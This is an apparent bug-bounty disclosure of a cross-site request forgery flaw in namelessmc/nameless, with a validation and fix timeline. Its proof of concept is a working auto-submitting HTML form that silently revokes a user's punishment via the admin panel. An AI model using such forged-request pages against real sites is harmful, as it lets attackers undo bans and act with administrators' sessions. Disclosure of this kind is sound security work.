Cross-Site Request Forgery (CSRF) in namelessmc/nameless

Valid

Reported on

Sep 24th 2021


Description

With this CSRF any user is able to remove any punishment on any user made by the staff.

Proof of Concept

After you log in, open this POC.html in a browser. This will remove any punishment that's specified in the POC.

<body>
<script>history.pushState('', '', '/')</script>
<form action="https://example.com/panel/users/punishments/?user=2&do=revoke&id=1">
    <input type="submit" value="Submit request" />
</form>
<script>
  document.forms[0].submit();
</script>
</body>
</html>

This specific POC will remove the 1st punishment from the userid 2.

Impact

This vulnerability is capable of allowing banned users to re access the site.

We have contacted a member of the namelessmc/nameless team and are waiting to hear back a year ago
hexdubbers modified the report
a year ago
Sam validated this vulnerability a year ago
hexdubbers has been awarded the disclosure bounty
The fix bounty is now up for grabs
Sam marked this as fixed with commit e24722 a year ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
to join this conversation